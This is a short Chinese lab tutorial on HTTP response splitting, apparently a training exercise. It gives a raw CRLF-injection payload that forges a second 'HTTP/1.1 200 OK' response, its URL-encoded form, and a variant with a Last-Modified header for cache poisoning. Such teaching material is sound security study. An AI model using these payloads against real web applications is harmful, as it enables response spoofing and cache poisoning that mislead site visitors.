Http拆分(原理+攻击)

这里有两节，一个是HTTP拆分攻击原理，第二节是介绍缓存攻击

第一节 将以下内容 encode:

linken

Content-Length: 0

 

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 47

<html>test</html>

 

将空格和回车转换%0D%0A，转换之后的内容

linken%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%3Chtml%3Etest%3C%2Fhtml%3E%0D%0A

『说明：这里不能在Scarab里转，Scarab只能将回车转换成%0A，不能将回车转成%0D%0A』

 

 

Encode之后

 

解决方案:在 http://yehg.net/encoding/ 里转换

 

转换后

 

将转换之后的内容粘贴到文本框内

 

成功之后会显示<html>test</html>里的内容，如下图

 

第二节HTTP攻击：插入HTTP语句 Last-Modified: Mon, 27 Oct 2017 14:50:18 GMT，可以达到修改缓存的目的

linken

Content-Length: 0

 

HTTP/1.1 200 OK

Content-Type: text/html

Last-Modified: Mon, 27 Oct 2017 14:50:18 GMT

Content-Length: 47

<html>test</html>

将以上代码Encode之后得到如下

linken%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202017%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%3Chtml%3Etest%3C%2Fhtml%3E